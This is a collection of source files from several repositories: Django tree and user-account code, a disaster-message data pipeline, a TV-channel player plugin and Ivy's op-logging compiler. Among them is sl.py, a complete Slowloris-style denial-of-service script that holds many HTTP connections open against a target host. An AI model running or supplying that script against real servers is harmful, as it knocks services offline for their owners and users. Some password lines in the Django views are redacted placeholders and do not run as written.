super(UnorderedTreeMixin, self).save(*args, **kwargs)
def _set_path(self):
if self.part_of:
self.path = "%s%i/" % (self.part_of.path, self.id)
else:
self.path = "%i/" % self.id
@property
def level(self):
"Count how far down in the tree self is"
return six.text_type(self.path).count(self._sep)
def roots(self):
"Get all roots, nodes without parents"
return self._default_manager.filter(part_of__isnull=True)
def get_path(self):
"Get all ancestors, ordered from root to self"
return [self._default_manager.get(id=p) for p in six.text_type(self.path).split(self._sep) if p]
def descendants(self):
"Get all descendants in no particular order"
return self._default_manager.filter(path__startswith=self.path).exclude(id=self.id)
def parent(self):
"Get parent of self"
return self.part_of
def siblings(self):
"Get all nodes with the same parent"
if not self.part_of: return []
return [p for p in self.part_of.descendants() if p.level == self.level]
def children(self):
"Get nodes that have self as parent"
return [p for p in self.descendants() if p.level == self.level + 1]
def is_sibling_of(self, node):
"Check if <node> has the same parent as self"
return self.part_of == node.part_of
def is_child_of(self, node):
"Check if <node> is the parent of self"
return self.part_of == node
def is_root(self):
"""Check if self is a root. Roots have no parents"""
return not bool(self.part_of)
def is_leaf(self):
"""Check if self is a leaf. Leaves have no descendants"""
return self.descendants().count() == 0
class AbstractText(models.Model):
"Denormalized storage of text"
DEFAULT_TYPE = 'plaintext'
text = models.TextField()
text_formatted = models.TextField(editable=False)
text_type = models.CharField(max_length=64, default=DEFAULT_TYPE)
class Meta:
abstract = True
def save(self, formatters=None, *args, **kwargs):
if self.text_type == self.DEFAULT_TYPE:
self.text_formatted = self.text
else:
if formatters:
self.text_formatted = formatters(self.text_type)
super(AbstractText, self).save(*args, **kwargs)
class GenericForeignKeyAbstractModel(models.Model):
"""
An abstract base class for models with one GenericForeignKey
"""
# Content-object field
content_type = models.ForeignKey('contenttypes.ContentType', verbose_name=_('content type'), related_name="content_type_set_for_%(class)s")
object_pk = models.TextField(_('object ID'))
content_object = generic.GenericForeignKey(ct_field="content_type", fk_field="object_pk")
class Meta:
abstract = True
```
#### File: tools/templatetags/nano_tags.py
```python
from __future__ import unicode_literals
from __future__ import unicode_literals
from math import modf, floor, ceil
from django import template
from django.template.defaultfilters import stringfilter
from nano.tools import grouper
register = template.Library()
@register.filter
def startswith(value, arg):
"""Usage {% if value|startswith:"arg" %}"""
if value:
return value.startswith(arg)
return False
startswith.is_safe = True
@register.filter
def endswith(value, arg):
"""Usage {% if value|endswith:"arg" %}"""
if value:
return value.endswith(arg)
return False
endswith.is_safe = True
@register.filter
@stringfilter
def nbr(text):
"""Replace whitespace with non-breaking-space"""
pieces = text.split()
text = '\xa0'.join(pieces)
return text.encode('utf8')
nbr.is_safe = True
@register.filter
def partition(iterable, cols=4):
"Split an iterable into columns"
if not iterable:
return ()
try:
cols = int(cols)
except (ValueError, TypeError):
return None
the_tuple = tuple(iterable)
maxrows = int(ceil(len(the_tuple)/float(cols)))
columns = grouper(maxrows, the_tuple)
return zip(*tuple(columns))
partition.is_safe = True
@register.filter
def integer(text):
"Get integer-part of float"
_, integer = modf(float(text))
return str(int(integer))
integer.is_safe = True
@register.filter
def fraction(text, arg=1):
"Get fractional part of float, pad with zeroes until <arg> length"
arg = int(arg)
fraction, _ = modf(float(text))
integer, fraction = str(fraction).split('.', 1)
lf = len(fraction)
fraction = fraction[:arg]
if arg > lf:
fraction = '%s%s' % (fraction, '0'*(arg-lf))
return fraction
fraction.is_safe = True
@register.inclusion_tag('come_back.html', takes_context=True)
def come_back(context):
"""Turn current url path into a query-part for use in urls
With default template:
If the path is stored in the context as /foo/bar, tag returns '?next=/foo/bar'
"""
whereami = context.get('whereami')
request = context.get('request')
if request:
path_info = request.META.get('PATH_INFO')
return { 'come_back': whereami or path_info or '' }
```
#### File: nano/user/tests.py
```python
from django.utils.timezone import now as tznow
from django.test import TestCase
from nano.faq.models import QA
class QATest(TestCase):
def test_str(self):
item = QA(question='blbl', answer='fofo')
self.assertEqual(str(item), item.question)
def test_save(self):
item = QA(question='blbl', answer='fofo')
item.save()
self.assertNotEqual(item.last_modified, None)
```
#### File: nano/user/views.py
```python
from __future__ import unicode_literals
from random import choice, sample
import string
from django.utils.timezone import now as tznow
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
from django.contrib.auth import get_user_model
from django.core.mail import send_mail
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, render
from django.template.defaultfilters import slugify
from nano.tools import pop_error, get_profile_model, asciify
from nano.user.forms import SignupForm, PasswordChangeForm, PasswordResetForm
from nano.user import new_user_created
import logging
_LOG = logging.getLogger(__name__)
class NanoUserError(Exception):
pass
class NanoUserExistsError(NanoUserError):
pass
# def pop_error(request):
# error = request.session.get('error', None)
# if 'error' in request.session:
# del request.session['error']
# return error
def random_password():
sample_space = string.ascii_letters + string.digits + r'!#$%&()*+,-.:;=?_'
outlist = []
for i in range(1,8):
chars = sample(sample_space, 2)
outlist.extend(chars)
return ''.join(outlist)
def make_user(username, password, email=None, request=None):
User = get_user_model()
try:
User.objects.get(username=username)
except User.DoesNotExist:
# make user
user = User(username=username[:30])
user.set_password(password)
user.is_staff = False
user.is_superuser = False
user.is_active = True
if email:
user.email = email
user.save()
# Create profile
Profile = get_profile_model(raise_on_error=False)
if Profile:
profile = Profile(user=user, display_name=username)
profile.save()
# Don't signal creation of test users
test_users = getattr(settings, 'NANO_USER_TEST_USERS', ())
for test_user in test_users:
if user.username.startswith(test_user):
break
else:
new_user_created.send(sender=User, user=user)
if request is not None:
infomsg = 'You\'re now registered, as "%s"' % username
messages.info(request, infomsg)
_LOG.debug('Created user: %s/%s' % (user, user.check_password(password)))
return user
else:
raise NanoUserExistsError("The username '%s' is already in use by somebody else" % username)
def signup(request, template_name='signup.html', *args, **kwargs):
me = 'people'
error = pop_error(request)
data = {
'me': me,
'error': error,
'form': SignupForm()
}
if request.method == 'POST':
form = SignupForm(data=request.POST)
if form.is_valid():
username = asciify(form.cleaned_data['username'])
password = <PASSWORD>.cleaned_data['<PASSWORD>']
email = form.cleaned_data['email'].strip() or ''
errormsg = 'Username "%s" is taken'
# check that username not taken
userslug = slugify(username)
Profile = get_profile_model(raise_on_error=False)
if Profile.objects.filter(slug=userslug).count():
# error!
safe_username = slugify('%s-%s' % (username, str(tznow())))
changed_warningmsg = errormsg + ", changed it to '%s'."
messages.warning(request, changed_warningmsg % (username, safe_username))
username = safe_username
# make user
try:
user = make_user(username, password, email=email, request=request)
except NanoUserExistsError:
next_profile = Profile.objects.get(user=user).get_absolute_url()
return HttpResponseRedirect(next_profile)
else:
# fake authentication, avoid a db-lookup/thread-trouble/
# race conditions
user.backend = 'django.contrib.auth.backends.ModelBackend'
_LOG.debug('Attempting login of: %s' % user)
login(request, user)
nexthop = getattr(settings, 'NANO_USER_SIGNUP_NEXT', reverse('nano_user_signup_done'))
try:
nexthop_profile = Profile.objects.get(user=user).get_absolute_url()
return HttpResponseRedirect(nexthop_profile)
except Profile.DoesNotExist:
pass
return HttpResponseRedirect(nexthop)
_LOG.debug('Should never end up here')
return render(request, template_name, data)
@login_required
def password_change(request, *args, **kwargs):
error = pop_error(request)
template_name = 'password_change_form.html'
if request.method == "POST":
form = PasswordChangeForm(request.POST)
if form.is_valid():
password = form.cleaned_data['<PASSWORD>']
user = request.user
user.set_password(password)
user.save()
request.session['error'] = None
return HttpResponseRedirect('/password/change/done/')
else:
form = PasswordChangeForm()
data = { 'form': form,
'error': error,}
return render(request, template_name, data)
def password_reset(request, project_name='Nano', *args, **kwargs):
User = get_user_model()
error = pop_error(request)
template = 'password_reset_form.html'
e_template = 'password_reset.txt'
help_message = None
e_subject = '%s password assistance' % project_name
e_message = """Your new password is:
%%s
It is long deliberately, so change it to
something you'll be able to remember.
%s' little password-bot
""" % project_name
e_from = getattr(settings, 'NANO_USER_EMAIL_SENDER', '')
form = PasswordResetForm()
if e_from and request.method == 'POST':
form = PasswordResetForm(request.POST)
if form.is_valid():
user = get_object_or_404(User, username=form.cleaned_data['username'])
if user.email:
tmp_pwd = <PASSWORD>()
user.set_password(<PASSWORD>)
result = send_mail(subject=e_subject, from_email=e_from, message=e_message % tmp_pwd, recipient_list=(user.email,))
user.save()
request.session['error'] = None
return HttpResponseRedirect('/password/reset/sent/')
else:
error = """There's no email-address registered for '%s',
the password can't be reset.""" % user.username
request.session['error'] = error
data = {'form': form,
'help_message': help_message,
'error':error}
return render(request, template, data)
``` |
{
"source": "786country/emegency_pipeline",
"score": 3
} |
#### File: emegency_pipeline/data/process_data.py
```python
import sys
import pandas as pd
from sqlalchemy import create_engine
def load_data(messages_filepath, categories_filepath):
"""Load data for disaster management datasets and merge datasets.
Args:
messages_filepath (str): messages.csv filepath
categories_filepath (str): categories.csv filepath
Returns:
dataframe: merged datasets
"""
messages = pd.read_csv(messages_filepath)
categories = pd.read_csv(categories_filepath)
categories = categories.categories.str.split(';',expand=True)
row = categories.iloc[0].tolist()
category_colnames = [i[:-2] for i in row]
categories.columns = category_colnames
for column in categories:
# set each value to be the last character of the string
categories[column] = categories[column].str[-1:]
# convert column from string to numeric
categories[column] = categories[column].astype(float)
df = pd.concat([messages, categories], axis=1)
return df
def clean_data(df):
"""Clean merged dataset.
Args:
df (dataframe): merged dataset
Returns:
dataframe: dataset removed of duplicates
"""
df = df[~df.duplicated()]
return df
def save_data(df, database_filename):
"""Save data to sqllite db.
Args:
df (dataframe): dataframe required for saving into db
database_filename (str): database filename of db
"""
engine = create_engine(f'sqlite:///{database_filename}')
df.to_sql(database_filename, engine, index=False, if_exists='replace')
def main():
"""Ochestrate code execution."""
if len(sys.argv) == 4:
messages_filepath, categories_filepath, database_filepath = sys.argv[1:]
print('Loading data...\n MESSAGES: {}\n CATEGORIES: {}'
.format(messages_filepath, categories_filepath))
# Load data from csv
df = load_data(messages_filepath, categories_filepath)
print('Cleaning data...')
# Clean data
df = clean_data(df)
print('Saving data...\n DATABASE: {}'.format(database_filepath))
# Save data in sqllite db
save_data(df, database_filepath)
print('Cleaned data saved to database!')
else:
print('Please provide the filepaths of the messages and categories '\
'datasets as the first and second argument respectively, as '\
'well as the filepath of the database to save the cleaned data '\
'to as the third argument. \n\nExample: python process_data.py '\
'disaster_messages.csv disaster_categories.csv '\
'DisasterResponse.db')
if __name__ == '__main__':
main()
``` |
{
"source": "786country/lending_club",
"score": 4
} |
#### File: 786country/lending_club/functions.py
```python
import pandas as pd
def missing_zero_values_table(df):
"""To summarise missing values in one dataframe.
Args:
df (dataframe): dataframe missing value analysis is required on
Returns:
dataframe: dataframe containing missing value analysis
"""
# https://stackoverflow.com/questions/51070985/find-out-the-percentage-of-missing-values-in-each-column-in-the-given-dataset
zero_val = (df == 0.00).astype(int).sum(axis=0)
mis_val = df.isnull().sum()
mis_val_percent = 100 * df.isnull().sum() / len(df)
mz_table = pd.concat([zero_val, mis_val, mis_val_percent], axis=1)
mz_table = mz_table.rename(
columns={0: "Zero Values", 1: "Missing Values", 2: "% of Total Values"}
)
mz_table["Total Zero Missing Values"] = (
mz_table["Zero Values"] + mz_table["Missing Values"]
)
mz_table["% Total Zero Missing Values"] = (
100 * mz_table["Total Zero Missing Values"] / len(df)
)
mz_table["Data Type"] = df.dtypes
mz_table = (
mz_table[mz_table.iloc[:, 1] != 0]
.sort_values("% of Total Values", ascending=False)
.round(1)
)
print(
"Your selected dataframe has "
+ str(df.shape[1])
+ " columns and "
+ str(df.shape[0])
+ " Rows.\n"
"There are " + str(mz_table.shape[0]) +
" columns that have missing values."
)
return mz_table
``` |
{
"source": "789it789/sl.py",
"score": 3
} |
#### File: 789it789/sl.py/sl.py
```python
import socket, random, time, sys, argparse
parser = argparse.ArgumentParser()
parser.add_argument('host', nargs="?")
parser.add_argument('-p', '--port', default=80, type=int)
parser.add_argument('-s', '--sockets', default=150, type=int)
args = parser.parse_args()
if len(sys.argv)<=1:
sys.exit(1)
if not args.host:
sys.exit(1)
list_of_sockets = []
user_agents = ["Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"]
def init_socket(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(4)
s.connect((ip,args.port))
s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
return s
def main():
ip = args.host
socket_count = args.sockets
print("The target server {} is being tested with {} sockets".format(ip, socket_count))
for _ in range(socket_count):
try:
print("Creating socket: {}".format(_ + 1))
sys.stdout.flush()
s = init_socket(ip)
except socket.error:
break
list_of_sockets.append(s)
while True:
print("Finished, Socket count: {}".format(len(list_of_sockets)))
for s in list(list_of_sockets):
try:
s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
except socket.error:
list_of_sockets.remove(s)
for _ in range(socket_count - len(list_of_sockets)):
print("Recreating socket: {}".format(_ + 1))
sys.stdout.flush()
try:
s = init_socket(ip)
if s:
list_of_sockets.append(s)
except socket.error:
break
time.sleep(15)
if __name__ == "__main__":
main()
``` |
{
"source": "791377533/stellar-watch-tv",
"score": 2
} |
#### File: 791377533/stellar-watch-tv/main.py
```python
import StellarPlayer
from .m3uParse import m3uParse
class weishiplugin(StellarPlayer.IStellarPlayerPlugin):
def __init__(self,player:StellarPlayer.IStellarPlayer):
super().__init__(player)
print("init weishi plugin")
self.list_weishi = []
self.list_weishi_name = []
def show(self):
print('ui start')
test = m3uParse()
filePath = __file__
pos = filePath.rindex('\\')
filePath2 = filePath[0:pos]
newFilePath = filePath2 + "\\" + "weishi.m3u"
self.list_weishi = test.openFile(newFilePath)
self.list_weishi_name = test.getListName()
list_item_layout = [
[
{'type': 'space', 'width': 5},
{
'group': [
{'type': 'button', 'name': 'weishi', 'textColor': '#FFFFFFE6', 'fontSize': 16,'matchParent':True},
{'type':'space','width':6},
{'type': 'button', 'name': 'weishi1', 'textColor': '#FFFFFFE6', 'fontSize': 16,'matchParent':True},
{'type':'space','width':6},
{'type': 'button', 'name': 'weishi2', 'textColor': '#FFFFFFE6', 'fontSize': 16,'matchParent':True},
{'type':'space','width':6},
{'type': 'button', 'name': 'weishi3', 'textColor': '#FFFFFFE6', 'fontSize': 16,'matchParent':True},
{'type':'space','width':6},
{'type': 'button', 'name': 'weishi4', 'textColor': '#FFFFFFE6', 'fontSize': 16,'matchParent':True},
{'type':'space','width':6}
], 'dir': 'hertical'
}
]
]
controls = [
{'type':'space','height':10},
[
{'type':'space','width':10},
{'type':'list','name':'list1','itemheight':30,'itemlayout':list_item_layout,'value':self.list_weishi_name,'marginSize':3},
{'type':'space','width':10}
],
{'type':'space','height':10}
]
result, controls = self.player.doModal('test', 740, 750, '我要看电视', controls)
print(f'{result=},{controls=}')
def onListItemClick(self, page, control, item):
print(f'onListItemClick,{control=},{item=}')
def onListItemControlClick(self, page, listControl, item, itemControl):
keyName = self.list_weishi_name[item]
key = ""
index = 0
print(f'onListItemControlClick,{item=}')
if itemControl == 'weishi':
key = keyName["weishi"]
index = (item + 1) * 5 - 5
elif itemControl == 'weishi1':
key = keyName["weishi1"]
index = (item + 1) * 5 - 4
elif itemControl == 'weishi2':
key = keyName["weishi2"]
index = (item + 1) * 5 - 3
elif itemControl == 'weishi3':
key = keyName["weishi3"]
index = (item + 1) * 5 - 2
elif itemControl == 'weishi4':
key = keyName["weishi4"]
index = (item + 1) * 5 - 1
self.player.play(self.list_weishi[index]['link'])
def stop(self):
super().stop()
print("pugin stop")
def newPlugin(player:StellarPlayer.IStellarPlayer,*arg):
plugin = weishiplugin(player)
return plugin
def destroyPlugin(plugin:StellarPlayer.IStellarPlayerPlugin):
plugin.stop()
``` |
{
"source": "792370706/Ivy",
"score": 2
} |
#### File: ivy/compiler/op_logging.py
```python
import ivy
import weakref
import inspect
import importlib
# local
from ivy.compiler import globals as glob
# noinspection PyProtectedMember
from ivy.compiler.helpers import _get_unique_id, _get_shape, _get_fn_signature, _clone_param, _delete_dependent_param,\
_args_n_kwarg_reprs_from_keys_n_args_n_kwargs, _output_reprs_from_output
# noinspection PyProtectedMember
from ivy.wrapper import _wrap_or_unwrap_methods, NON_WRAPPED_METHODS, ARRAYLESS_RET_METHODS
def _wrap_method_for_op_logging(fn, graph, limit_attributes=True, stateful_classes=None):
stateful_classes = tuple(ivy.default(stateful_classes, tuple()))
if (inspect.isclass(fn) or (hasattr(fn, '__name__') and
((fn.__name__[0] == '_' and fn.__name__ not in glob.ARRAY_BUILTINS) or
fn.__name__ in NON_WRAPPED_METHODS + ARRAYLESS_RET_METHODS)) or
(hasattr(fn, 'wrapped_for_compiling') and fn.wrapped_for_compiling)):
return fn
# noinspection PyUnresolvedReferences,PyProtectedMember
def _method_wrapped(*args, **kwargs):
# if cloning a param currently, return directly via the original function
if glob.wrapping_paused:
return fn(*args, **kwargs)
if glob.wrapped_stack:
# return if the wrapping is already happening on a higher level, and it's not a built-in which legitimately
# might need to be nested, unless it's a built-in recursion loop (ie for __getattribute__) in which case return
if (glob.wrapped_stack[-1].__name__[0:2] != '__' or
(glob.wrapped_stack[-1].__name__ == fn.__name__ and args == args and kwargs == kwargs)):
return fn(*args, **kwargs)
# return if the current method is a (possibly reversed) built-in operator, and the last entry of the wrapped
# stack is a version of that same operator
elif fn.__name__.replace('r', '').replace('_', '') in\
glob.wrapped_stack[-1].__name__.replace('r', '').replace('_', ''):
return fn(*args, **kwargs)
# attributes to ignore
if fn.__name__ in ['__getattr__', '__setattr__', '__getattribute__']:
att_name = args[1]
# return if the attribute being retrieved is another built-in method
if att_name[0:2] == '__':
return fn(*args, **kwargs)
# if the attribute is not recognized as one which can form part of the graph, then return
if limit_attributes and att_name not in glob.GRAPH_ATTRIBUTES[ivy.current_framework_str()]:
return fn(*args, **kwargs)
# otherwise, set wrapping as true
glob.wrapped_stack.append(fn)
# immutable tuple to mutable list
args = list(ivy.nested_map(args, lambda a: a, to_mutable=True))
kwargs = ivy.nested_map(kwargs, lambda v: v, to_mutable=True)
# get array idxs for positional args
# ToDo: work out why adding check_nests=True causes errors.
# This is needed in order to support stateful updates of ivy.Containers.
# arg_tracked_idxs = ivy.nested_indices_where(
# args, lambda x: ivy.is_array(x) or isinstance(x, stateful_classes), check_nests=True)
arg_tracked_idxs = ivy.nested_indices_where(
args, lambda x_: ivy.is_array(x_) or isinstance(x_, stateful_classes))
arg_vals = list(ivy.multi_index_nest(args, arg_tracked_idxs))
arg_param_ids = [_get_unique_id(x) for x in arg_vals]
for x in arg_vals:
glob.raw_pids_to_weakrefs[id(x)] = weakref.ref(x)
arg_param_types = [x.__class__ for x in arg_vals]
arg_param_var_flags = [ivy.is_variable(x, exclusive=True) for x in arg_vals]
arg_param_shapes = [_get_shape(x) for x in arg_vals]
# get array idxs for key-word args
# ToDo: work out why adding check_nests=True causes errors.
# This is needed in order to support stateful updates of ivy.Containers.
# kwarg_tracked_idxs = ivy.nested_indices_where(
# kwargs, lambda x: ivy.is_array(x) or isinstance(x, stateful_classes), check_nests=True)
kwarg_tracked_idxs = ivy.nested_indices_where(
kwargs, lambda x_: ivy.is_array(x_) or isinstance(x_, stateful_classes))
kwarg_vals = list(ivy.multi_index_nest(kwargs, kwarg_tracked_idxs))
kwarg_param_ids = [_get_unique_id(x) for x in kwarg_vals]
for x in kwarg_vals:
glob.raw_pids_to_weakrefs[id(x)] = weakref.ref(x)
kwarg_param_types = [x.__class__ for x in kwarg_vals]
kwarg_param_var_flags = [ivy.is_variable(x, exclusive=True) for x in kwarg_vals]
kwarg_param_shapes = [_get_shape(x) for x in kwarg_vals]
# set the backend function
backend_fn = fn
# compute the return
ret_raw = fn(*args, **kwargs)
# provide return value for __setattr__
if fn.__name__ == '__setattr__':
ret_raw = args[0]
# update the setattr method to return the object after attribute setting
def backend_fn(__obj, __name, __value):
setattr(__obj, __name, __value)
return __obj
# remove parameters from args and kwargs
ivy.map_nest_at_indices(args, arg_tracked_idxs, lambda x_: _delete_dependent_param(x_, graph))
ivy.map_nest_at_indices(kwargs, kwarg_tracked_idxs, lambda x_: _delete_dependent_param(x_, graph))
# covert return to list
ret_listified = False
if isinstance(ret_raw, tuple):
ret = list(ret_raw)
else:
ret = [ret_raw]
ret_listified = True
# get array idxs for return
# ToDo: work out why adding check_nests=True causes errors.
# This is needed in order to support stateful updates of ivy.Containers.
# output_tracked_idxs = ivy.nested_indices_where(
# ret, lambda x: ivy.is_array(x) or isinstance(x, stateful_classes), check_nests=True)
output_tracked_idxs = ivy.nested_indices_where(
ret, lambda x_: ivy.is_array(x_) or isinstance(x_, stateful_classes))
output_vals = list(ivy.multi_index_nest(ret, output_tracked_idxs))
output_param_ids = [_get_unique_id(x) for x in output_vals]
output_param_types = [x.__class__ for x in output_vals]
output_param_var_flags = [ivy.is_variable(x, exclusive=True) for x in output_vals]
output_param_shapes = [_get_shape(x) for x in output_vals]
# clone the param when getting an attribute, to preserve uniqueness in the graph
if fn.__name__ in ['__getattr__', '__getattribute__']:
# update the param_id for each param in the retreived attribute in the graph
ivy.map_nest_at_indices(ret, output_tracked_idxs, lambda x: _clone_param(x, graph))
# find all duplicate param ids from the input in the return
duplicates = list()
for i, ret_pid in enumerate(output_param_ids):
if ret_pid in arg_param_ids + kwarg_param_ids:
duplicates.append(i)
# clone all repeated return parameters to give unique parameter ids in the graph
duplicate_tracked_idxs = [output_tracked_idxs[i] for i in duplicates]
ivy.map_nest_at_indices(ret, duplicate_tracked_idxs, lambda x: _clone_param(x, graph))
# get return param ids after cloning
output_vals = list(ivy.multi_index_nest(ret, output_tracked_idxs))
output_param_ids = [_get_unique_id(x) for x in output_vals]
for x in output_vals:
glob.raw_pids_to_weakrefs[id(x)] = weakref.ref(x)
# maybe add to set of dependent_pids
if fn.__name__ in glob.GENERATOR_METHODS and graph.include_generators:
[glob.dependent_pids.add(pid) for pid in output_param_ids]
else:
for pid in arg_param_ids + kwarg_param_ids:
if pid in glob.dependent_pids:
[glob.dependent_pids.add(pid) for pid in output_param_ids]
break
# wrap the function
def new_fn(arg_array_vals, kwarg_array_vals):
# ToDo: make this as efficient as possible; this is performed at runtime
args_writeable = ivy.copy_nest(args)
kwargs_writeable = ivy.copy_nest(kwargs)
ivy.set_nest_at_indices(args_writeable, arg_tracked_idxs, arg_array_vals)
ivy.set_nest_at_indices(kwargs_writeable, kwarg_tracked_idxs, kwarg_array_vals)
return backend_fn(*args_writeable, **kwargs_writeable)
# add function attributes which inform about the arguments and returns
glob.wrapping_paused = True
new_fn.arg_reprs = str(args)
new_fn.arg_tracked_idxs = arg_tracked_idxs
new_fn.arg_param_ids = arg_param_ids
new_fn.arg_param_types = arg_param_types
new_fn.arg_param_var_flags = arg_param_var_flags
new_fn.arg_param_shapes = arg_param_shapes
new_fn.kwarg_reprs = str(kwargs)
new_fn.kwarg_tracked_idxs = kwarg_tracked_idxs
new_fn.kwarg_param_ids = kwarg_param_ids
new_fn.kwarg_param_types = kwarg_param_types
new_fn.kwarg_param_var_flags = kwarg_param_var_flags
new_fn.kwarg_param_shapes = kwarg_param_shapes
try:
sig = inspect.signature(fn)
sig_keys = list(sig.parameters.keys())
except ValueError:
sig_keys = list()
new_fn.arg_n_kwarg_reprs = _args_n_kwarg_reprs_from_keys_n_args_n_kwargs(sig_keys, args, kwargs)
new_fn.output_tracked_idxs = output_tracked_idxs
new_fn.output_param_ids = output_param_ids
new_fn.output_param_types = output_param_types
new_fn.output_param_var_flags = output_param_var_flags
new_fn.output_param_shapes = output_param_shapes
new_fn.output_reprs = _output_reprs_from_output(ret)
new_fn.signature = _get_fn_signature(backend_fn)
new_fn.terminal = True
new_fn.is_constant = len(arg_param_ids + kwarg_param_ids) == 0 and \
(not graph.include_generators or
fn.__name__ not in glob.GENERATOR_METHODS[ivy.current_framework_str()])
glob.wrapping_paused = False
fns_in = [graph._pid_to_functions_dict[pid]
for pid in arg_param_ids + kwarg_param_ids if pid in graph._pid_to_functions_dict]
for fn_in in fns_in:
fn_in.terminal = False
if new_fn not in fn_in.fns_out:
fn_in.fns_out.append(new_fn)
new_fn.fns_in = fns_in
new_fn.fns_out = list()
new_fn.__repr__ = lambda: new_fn.__name__
if hasattr(fn, '__name__'):
new_fn.__name__ = fn.__name__
# add to graph if compiling
if glob.op_logging:
# add this function to the graph for each output pid
for pid in output_param_ids:
if pid in graph._pid_to_functions_dict:
graph._register_output(ret)
glob.op_logging = False
_unwrap_methods_from_op_logging(list(graph._stateful_classes))
# noinspection PyBroadException
try:
graph.show(save_to_disk=True, output_connected_only=False)
except Exception:
pass
raise Exception(
'\n\ntried to add {} to graph._functions_dict, but function {} with the same output pid {} '
'already exists!'.format(
new_fn.__name__ + '(*{}, **{})'.format(new_fn.arg_reprs, new_fn.kwarg_reprs),
graph._pid_to_functions_dict[pid].__name__ + '(*{}, **{})'.format(
graph._pid_to_functions_dict[pid].arg_reprs,
graph._pid_to_functions_dict[pid].kwarg_reprs), pid))
graph.add_fn_to_dict(pid, new_fn)
# unset wrapping as true
glob.wrapped_stack.pop(-1)
# return the function output
return ret[0] if ret_listified else tuple(ret)
if hasattr(fn, '__name__'):
_method_wrapped.__name__ = fn.__name__
_method_wrapped.wrapped_for_compiling = True
_method_wrapped.inner_fn = fn
return _method_wrapped
def _unwrap_method_from_op_logging(method_wrapped):
if not hasattr(method_wrapped, 'wrapped_for_compiling') or not method_wrapped.wrapped_for_compiling:
return method_wrapped
return method_wrapped.inner_fn
def _wrap_methods_for_op_logging(graph, stateful_classes=None):
# wrap backend framework
classes_to_wrap = [getattr(importlib.import_module(ctw[0]), ctw[1])
for ctw in glob.CLASSES_TO_WRAP[ivy.current_framework_str()]]
_wrap_or_unwrap_methods(
lambda fn: _wrap_method_for_op_logging(fn, graph), classes_to_wrap=classes_to_wrap, native=True)
# wrap stateful classes
stateful_classes = ivy.default(stateful_classes, [])
for cls in stateful_classes:
assert hasattr(cls, '__setattr__') and (hasattr(cls, '__getattr__') or hasattr(cls, '__getattribute__'))
cls.__setattr__ = _wrap_method_for_op_logging(
cls.__setattr__, graph, limit_attributes=False, stateful_classes=stateful_classes)
if hasattr(cls, '__getattr__'):
cls.__getattr__ = _wrap_method_for_op_logging(
cls.__getattr__, graph, limit_attributes=False, stateful_classes=stateful_classes)
if hasattr(cls, '__getattribute__'):
cls.__getattribute__ = _wrap_method_for_op_logging(
cls.__getattribute__, graph, limit_attributes=False, stateful_classes=stateful_classes)
def _unwrap_methods_from_op_logging(stateful_classes=None):
# unwrap backend framework
classes_to_wrap = [getattr(importlib.import_module(ctw[0]), ctw[1])
for ctw in glob.CLASSES_TO_WRAP[ivy.current_framework_str()]] + stateful_classes
_wrap_or_unwrap_methods(
lambda fn: _unwrap_method_from_op_logging(fn), classes_to_wrap=classes_to_wrap, native=True)
# unwrap stateful classes
stateful_classes = ivy.default(stateful_classes, [])
for cls in stateful_classes:
assert hasattr(cls, '__setattr__') and (hasattr(cls, '__getattr__') or hasattr(cls, '__getattribute__'))
cls.__setattr__ = _unwrap_method_from_op_logging(cls.__setattr__)
if hasattr(cls, '__getattr__'):
cls.__getattr__ = _unwrap_method_from_op_logging(cls.__getattr__)
if hasattr(cls, '__getattribute__'):
cls.__getattribute__ = _unwrap_method_from_op_logging(cls.__getattribute__)
```
#### File: ivy/core/container.py
```python
import re
import termcolor
import numpy as _np
import json as _json
import h5py as _h5py
import pickle as _pickle
import random as _random
from operator import lt as _lt
from operator import le as _le
from operator import eq as _eq
from operator import ne as _ne
from operator import gt as _gt
from operator import ge as _ge
from operator import mul as _mul
from operator import pow as _pow
from operator import not_ as _not
from functools import reduce as _reduce
from typing import Union, Iterable, Dict
from operator import truediv as _truediv
from operator import floordiv as _floordiv
# local
import ivy as _ivy
def _is_jsonable(x):
try:
_json.dumps(x)
return True
except (TypeError, OverflowError):
return False
def _repr(x):
try:
return x.__repr__()
except TypeError:
return str(x)
# noinspection PyMissingConstructor
class Container(dict):
def __init__(self, dict_in=None, queues=None, queue_load_sizes=None, container_combine_method='list_join',
queue_timeout=None, print_limit=10, print_indent=4, print_line_spacing=0, ivyh=None,
keyword_color_dict=None, rebuild_child_containers=False, types_to_iteratively_nest=None, **kwargs):
"""
Initialize container object from input dict representation.
:param dict_in: the dictionary the container should wrap around. Default is None.
:type dict_in: dict, optional
:param queues: Sequence of multiprocessing queues, each of which returns containers.
This enables the current container to be passed around asynchronously while waiting for data.
Default is None.
:type queues: sequence of multiprocessing queues, optional
:param queue_load_sizes: Size of leading dimension of the containers returned by each queue. Default is None.
:type queue_load_sizes: sequence of ints, optional
:param container_combine_method: The method to use for combining containers arriving from different queues.
Default is ivy.Container.list_join
:type container_combine_method: str, optional
:param queue_timeout: The timeout when waiting for containers to arrive from the queues. Default is global.
:type queue_timeout: float, optional
:param print_limit: The total array size limit when printing the container. Default is 10.
:type print_limit: int, optional
:param print_indent: The number of whitespaces to use for indenting when printing the container. Default is 4.
:type print_indent: int, optional
:param print_line_spacing: The number of extra newlines to use between keys when printing the container.
Default is 0.
:type print_line_spacing: int, optional
:param ivyh: Handle to ivy module to use for the calculations. Default is None, which results in the global ivy.
:type ivyh: handle to ivy module, optional
:param keyword_color_dict: A dict mapping keywords to their termcolor color codes for printing the container.
:type keyword_color_dict: dict, optional
:param rebuild_child_containers: Whether to rebuild container found in dict_in with these constructor params.
Default is False, in which case the original container are kept as are.
:type rebuild_child_containers: bool, optional
:param types_to_iteratively_nest: The data types to nest iteratively in the dict structure, each type must be
iterable. Default is None.
:type types_to_iteratively_nest: seq of iterable types
:param kwargs: keyword arguments for dict creation. Default is None.
:type kwargs: keyword arguments.
"""
self._queues = queues
self._print_limit = print_limit
self._print_indent = print_indent
